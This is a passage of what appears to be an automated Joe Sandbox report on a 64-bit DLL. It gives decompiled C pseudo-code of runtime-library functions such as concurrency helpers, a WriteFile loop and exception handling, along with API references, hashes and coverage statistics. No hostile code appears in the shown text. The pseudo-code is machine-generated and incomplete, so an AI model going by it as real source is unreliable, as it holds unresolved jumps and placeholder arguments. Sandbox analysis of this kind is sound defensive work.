                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 953036326-0
                                                                                                        • Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                        • Instruction ID: 95c2046f039b0747d5d63d54b57c49b454cc799a624a7f1533358ba5bb3cad64
                                                                                                        • Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                        • Instruction Fuzzy Hash: EB911766B18E6A85FB50CB6584406FD27B8BB847A8F840175DF8E53784CFB8D869C720
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 47%
                                                                                                        			E00007FFC7FFC123D1CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				intOrPtr* _t50;
                                                                                                        				intOrPtr* _t52;
                                                                                                        				intOrPtr _t62;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC123D2250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x123d1d3a;
                                                                                                        				E00007FFC7FFC123D18F0(__rax, _a8);
                                                                                                        				_t48 = _a16 - __rax;
                                                                                                        				E00007FFC7FFC123D1DF0(_t48, _a8, _a8, _t48, _a24);
                                                                                                        				goto 0x123d1de7;
                                                                                                        				E00007FFC7FFC123D2170(_t48, _a8);
                                                                                                        				_t62 =  *0x1244a228; // 0xffffffffffffffff
                                                                                                        				_t50 = _t62 -  *_t48;
                                                                                                        				if (_t50 - _a24 > 0) goto 0x123d1d65;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2170(_t50, _a8);
                                                                                                        				_t52 =  *_t50 + _a24;
                                                                                                        				_v24 = _t52;
                                                                                                        				if (_a24 <= 0) goto 0x123d1de2;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC123D22B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x123d1de2;
                                                                                                        				E00007FFC7FFC123D18F0(_t52, _a8);
                                                                                                        				_v16 = _t52;
                                                                                                        				E00007FFC7FFC123D2170(_t52, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_v16 +  *_t52, _a16, _a24);
                                                                                                        				return E00007FFC7FFC123D23A0(_v16 +  *_t52, _a8, _v24);
                                                                                                        			}









                                                                                                        0x7ffc123d1ce0
                                                                                                        0x7ffc123d1ce5
                                                                                                        0x7ffc123d1cea
                                                                                                        0x7ffc123d1d07
                                                                                                        0x7ffc123d1d0e
                                                                                                        0x7ffc123d1d1b
                                                                                                        0x7ffc123d1d30
                                                                                                        0x7ffc123d1d35
                                                                                                        0x7ffc123d1d3f
                                                                                                        0x7ffc123d1d47
                                                                                                        0x7ffc123d1d51
                                                                                                        0x7ffc123d1d59
                                                                                                        0x7ffc123d1d60
                                                                                                        0x7ffc123d1d6a
                                                                                                        0x7ffc123d1d72
                                                                                                        0x7ffc123d1d77
                                                                                                        0x7ffc123d1d82
                                                                                                        0x7ffc123d1d84
                                                                                                        0x7ffc123d1d9b
                                                                                                        0x7ffc123d1da2
                                                                                                        0x7ffc123d1da7
                                                                                                        0x7ffc123d1db1
                                                                                                        0x7ffc123d1dce
                                                                                                        0x7ffc123d1deb

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D226B
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1D0E
                                                                                                          • Part of subcall function 00007FFC123D18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D18FE
                                                                                                          • Part of subcall function 00007FFC123D1DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D1E56
                                                                                                          • Part of subcall function 00007FFC123D1DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1E98
                                                                                                          • Part of subcall function 00007FFC123D1DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1EAC
                                                                                                          • Part of subcall function 00007FFC123D1DF0: char_traits.LIBCPMTD ref: 00007FFC123D1EDB
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D1D60
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1DA2
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D1DCE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 3922470843-0
                                                                                                        • Opcode ID: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
                                                                                                        • Instruction ID: 4fb6a0b5460c49f9d05ed96c382bf6b150adef42d93bb05c837a4ee26446d6fc
                                                                                                        • Opcode Fuzzy Hash: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
                                                                                                        • Instruction Fuzzy Hash: 0621FE2A618E9D82DA50DB56E4501BEA374FBC5BE0F904072FBCD47B6ACE6DD410CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC123D1DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _t44;
                                                                                                        				intOrPtr* _t49;
                                                                                                        				intOrPtr* _t51;
                                                                                                        				long long _t53;
                                                                                                        				intOrPtr* _t54;
                                                                                                        				intOrPtr _t61;
                                                                                                        
                                                                                                        				_t49 = __rax;
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC123D21F0(_t44, __rax, _a16, _a24);
                                                                                                        				E00007FFC7FFC123D2400(_t44, __rax, _a16, _a24, _a32);
                                                                                                        				_a32 = _t49;
                                                                                                        				E00007FFC7FFC123D2170(_t49, _a8);
                                                                                                        				_t61 =  *0x1244a228; // 0xffffffffffffffff
                                                                                                        				_t51 = _t61 -  *_t49;
                                                                                                        				if (_t51 - _a32 > 0) goto 0x123d1e5b;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2170(_t51, _a8);
                                                                                                        				_t53 =  *_t51 + _a32;
                                                                                                        				_v40 = _t53;
                                                                                                        				if (_a32 <= 0) goto 0x123d1eef;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC123D22B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x123d1eef;
                                                                                                        				E00007FFC7FFC123D18D0(_t53, _a16);
                                                                                                        				_t54 = _t53 + _a24;
                                                                                                        				_v24 = _t54;
                                                                                                        				E00007FFC7FFC123D18F0(_t54, _a8);
                                                                                                        				_v32 = _t54;
                                                                                                        				E00007FFC7FFC123D2170(_t54, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_v32 +  *_t54, _v24, _a32);
                                                                                                        				return E00007FFC7FFC123D23A0(_v32 +  *_t54, _a8, _v40);
                                                                                                        			}












                                                                                                        0x7ffc123d1df0
                                                                                                        0x7ffc123d1df0
                                                                                                        0x7ffc123d1df5
                                                                                                        0x7ffc123d1dfa
                                                                                                        0x7ffc123d1dff
                                                                                                        0x7ffc123d1e12
                                                                                                        0x7ffc123d1e26
                                                                                                        0x7ffc123d1e2b
                                                                                                        0x7ffc123d1e35
                                                                                                        0x7ffc123d1e3d
                                                                                                        0x7ffc123d1e47
                                                                                                        0x7ffc123d1e4f
                                                                                                        0x7ffc123d1e56
                                                                                                        0x7ffc123d1e60
                                                                                                        0x7ffc123d1e68
                                                                                                        0x7ffc123d1e6d
                                                                                                        0x7ffc123d1e78
                                                                                                        0x7ffc123d1e7a
                                                                                                        0x7ffc123d1e91
                                                                                                        0x7ffc123d1e98
                                                                                                        0x7ffc123d1e9d
                                                                                                        0x7ffc123d1ea2
                                                                                                        0x7ffc123d1eac
                                                                                                        0x7ffc123d1eb1
                                                                                                        0x7ffc123d1ebb
                                                                                                        0x7ffc123d1edb
                                                                                                        0x7ffc123d1ef8

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D21F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D2217
                                                                                                          • Part of subcall function 00007FFC123D2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D217E
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D1E56
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1E98
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1EAC
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D1EDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 3679362534-0
                                                                                                        • Opcode ID: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
                                                                                                        • Instruction ID: 539c1af5c9c79f3473e2f2efef225024557b4b4c8f60c51de5ee25c2dfe5ccb0
                                                                                                        • Opcode Fuzzy Hash: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
                                                                                                        • Instruction Fuzzy Hash: AF21ED3A618F9982DA10DB56E49116EA364FBC4BE0F800075FACD47B6ACEBCD461CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 56%
                                                                                                        			E00007FFC7FFC123E1004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                        				intOrPtr _v0;
                                                                                                        				signed long long _v8;
                                                                                                        				void* __rdi;
                                                                                                        				void* __rsi;
                                                                                                        				signed int _t41;
                                                                                                        				signed long long _t62;
                                                                                                        				short* _t67;
                                                                                                        				signed int* _t68;
                                                                                                        				intOrPtr* _t74;
                                                                                                        				intOrPtr* _t76;
                                                                                                        				void* _t84;
                                                                                                        				void* _t88;
                                                                                                        				signed short* _t89;
                                                                                                        				void* _t91;
                                                                                                        				void* _t94;
                                                                                                        				signed short* _t97;
                                                                                                        				void* _t99;
                                                                                                        				void* _t101;
                                                                                                        				void* _t103;
                                                                                                        				void* _t106;
                                                                                                        				void* _t107;
                                                                                                        
                                                                                                        				_t97 = __r8;
                                                                                                        				_t76 = __rcx;
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a24 = __rbp;
                                                                                                        				E00007FFC7FFC123E2DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
                                                                                                        				_t62 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				_a5176 = _t62 ^ _t94 - __rax;
                                                                                                        				_t74 = _t76;
                                                                                                        				r14d = r9d;
                                                                                                        				r10d = r10d & 0x0000003f;
                                                                                                        				_t107 = _t106 + _t97;
                                                                                                        				_t89 = _t97;
                                                                                                        				 *_t74 =  *((intOrPtr*)(0x1244f940 + (__edx >> 6) * 8));
                                                                                                        				 *((intOrPtr*)(_t74 + 8)) = 0;
                                                                                                        				if (_t97 - _t107 >= 0) goto 0x123e1145;
                                                                                                        				_t67 =  &_a40;
                                                                                                        				if (_t89 - _t107 >= 0) goto 0x123e10ae;
                                                                                                        				_t41 =  *_t89 & 0x0000ffff;
                                                                                                        				if (_t41 != 0xa) goto 0x123e109a;
                                                                                                        				 *_t67 = 0xd;
                                                                                                        				_t68 = _t67 + 2;
                                                                                                        				 *_t68 = _t41;
                                                                                                        				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x123e107c;
                                                                                                        				_a16 = _a16 & 0x00000000;
                                                                                                        				_a8 = _a8 & 0x00000000;
                                                                                                        				_v0 = 0xd55;
                                                                                                        				_v8 =  &_a1752;
                                                                                                        				r9d = 0;
                                                                                                        				E00007FFC7FFC123DD698();
                                                                                                        				if (0 == 0) goto 0x123e113d;
                                                                                                        				if (0 == 0) goto 0x123e112d;
                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                        				r8d = 0;
                                                                                                        				r8d = r8d;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x123e113d;
                                                                                                        				if (0 + _a24 < 0) goto 0x123e10fa;
                                                                                                        				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
                                                                                                        				goto 0x123e1071;
                                                                                                        				 *_t74 = GetLastError();
                                                                                                        				return E00007FFC7FFC123D3A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
                                                                                                        			}
























                                                                                                        0x7ffc123e1004
                                                                                                        0x7ffc123e1004
                                                                                                        0x7ffc123e1004
                                                                                                        0x7ffc123e1009
                                                                                                        0x7ffc123e101b
                                                                                                        0x7ffc123e1023
                                                                                                        0x7ffc123e102d
                                                                                                        0x7ffc123e1038
                                                                                                        0x7ffc123e103e
                                                                                                        0x7ffc123e104c
                                                                                                        0x7ffc123e1050
                                                                                                        0x7ffc123e1056
                                                                                                        0x7ffc123e1068
                                                                                                        0x7ffc123e106e
                                                                                                        0x7ffc123e1071
                                                                                                        0x7ffc123e1077
                                                                                                        0x7ffc123e107f
                                                                                                        0x7ffc123e1081
                                                                                                        0x7ffc123e108c
                                                                                                        0x7ffc123e1093
                                                                                                        0x7ffc123e1096
                                                                                                        0x7ffc123e109a
                                                                                                        0x7ffc123e10ac
                                                                                                        0x7ffc123e10ae
                                                                                                        0x7ffc123e10b9
                                                                                                        0x7ffc123e10c7
                                                                                                        0x7ffc123e10da
                                                                                                        0x7ffc123e10df
                                                                                                        0x7ffc123e10e9
                                                                                                        0x7ffc123e10f2
                                                                                                        0x7ffc123e10f8
                                                                                                        0x7ffc123e10fa
                                                                                                        0x7ffc123e110f
                                                                                                        0x7ffc123e1118
                                                                                                        0x7ffc123e1123
                                                                                                        0x7ffc123e112b
                                                                                                        0x7ffc123e1132
                                                                                                        0x7ffc123e1138
                                                                                                        0x7ffc123e1143
                                                                                                        0x7ffc123e1173

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                        • String ID: U
                                                                                                        • API String ID: 442123175-4171548499
                                                                                                        • Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                        • Instruction ID: 5726c5b7c1cee909ec2dafaa6786ab9b98467da45add4589399e4dd95f52781a
                                                                                                        • Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                        • Instruction Fuzzy Hash: 9C41D466B18A9981EB208F25E4443EA77A4FB887A4F814031EE8D87788DF7CD855C750
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC123E2EB4(intOrPtr* __rcx) {
                                                                                                        				void* __rbx;
                                                                                                        				void* _t3;
                                                                                                        				void* _t7;
                                                                                                        				void* _t10;
                                                                                                        				void* _t11;
                                                                                                        				void* _t12;
                                                                                                        				void* _t13;
                                                                                                        
                                                                                                        				_t3 = E00007FFC7FFC123D6B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
                                                                                                        				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x123e2ed5;
                                                                                                        				if ( *__rcx != 0xe06d7363) goto 0x123e2ed5;
                                                                                                        				if (_t3 == 1) goto 0x123e2edb;
                                                                                                        				return _t3;
                                                                                                        			}










                                                                                                        0x7ffc123e2ebd
                                                                                                        0x7ffc123e2ec6
                                                                                                        0x7ffc123e2ece
                                                                                                        0x7ffc123e2ed3
                                                                                                        0x7ffc123e2eda

                                                                                                        APIs
                                                                                                        • __C_specific_handler.LIBVCRUNTIME ref: 00007FFC123E2EBD
                                                                                                          • Part of subcall function 00007FFC123D6B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFC123D6C0C
                                                                                                          • Part of subcall function 00007FFC123D6B4C: RtlUnwindEx.KERNEL32 ref: 00007FFC123D6C5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: C_specific_handlerCurrentImageNonwritableUnwind
                                                                                                        • String ID: csm$f
                                                                                                        • API String ID: 1396615161-629598281
                                                                                                        • Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                        • Instruction ID: 73a09a98a31364a6815dc25c746fe83293e1eeabe56b54ac01c176f61382c8a7
                                                                                                        • Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                        • Instruction Fuzzy Hash: 6FD05E5DC0856E8AFB39357110452F805984FDCB34E8884B0CA2804286AF9DA8F4CA21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: P
                                                                                                        • API String ID: 1693014935-3110715001
                                                                                                        • Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                        • Instruction ID: 0ac2d5ee808b6e56fd22d2611d0d23c3fe8ac1162c5b4407188deec4f58bed8e
                                                                                                        • Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                        • Instruction Fuzzy Hash: 0B01AF36519F8486E7608F00F89839AB7B4F788758F600128E6CD46BA8DFBDD568CF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC123D472C(void* __eflags, void* __rax) {
                                                                                                        				char _v40;
                                                                                                        				void* _t6;
                                                                                                        				void* _t11;
                                                                                                        				void* _t12;
                                                                                                        				char* _t14;
                                                                                                        				void* _t16;
                                                                                                        
                                                                                                        				E00007FFC7FFC123D45C0(__rax,  &_v40);
                                                                                                        				_t14 =  &_v40;
                                                                                                        				_t6 = E00007FFC7FFC123D6E00(_t12, _t14, 0x1244cbd8, _t16);
                                                                                                        				asm("int3");
                                                                                                        				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
                                                                                                        				return _t6;
                                                                                                        			}









                                                                                                        0x7ffc123d4735
                                                                                                        0x7ffc123d4741
                                                                                                        0x7ffc123d4746
                                                                                                        0x7ffc123d474b
                                                                                                        0x7ffc123d4758
                                                                                                        0x7ffc123d475d

                                                                                                        APIs
                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFC123D4735
                                                                                                        • _CxxThrowException.LIBVCRUNTIME ref: 00007FFC123D4746
                                                                                                          • Part of subcall function 00007FFC123D6E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC123D472B), ref: 00007FFC123D6E7D
                                                                                                          • Part of subcall function 00007FFC123D6E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC123D472B), ref: 00007FFC123D6EBC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                        • String ID: Unknown exception
                                                                                                        • API String ID: 3561508498-410509341
                                                                                                        • Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                        • Instruction ID: 02353d74a777d14a4b47f529d78659e2f6995b691d2ec17ca3db08fd6482177a
                                                                                                        • Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                        • Instruction Fuzzy Hash: 61D05E2AA18D9E95EE10EB00E8803E86335FB80718FD04571E24C415B1EFACD66AC760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:9.9%
                                                                                                        Dynamic/Decrypted Code Coverage:3%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:701
                                                                                                        Total number of Limit Nodes:11
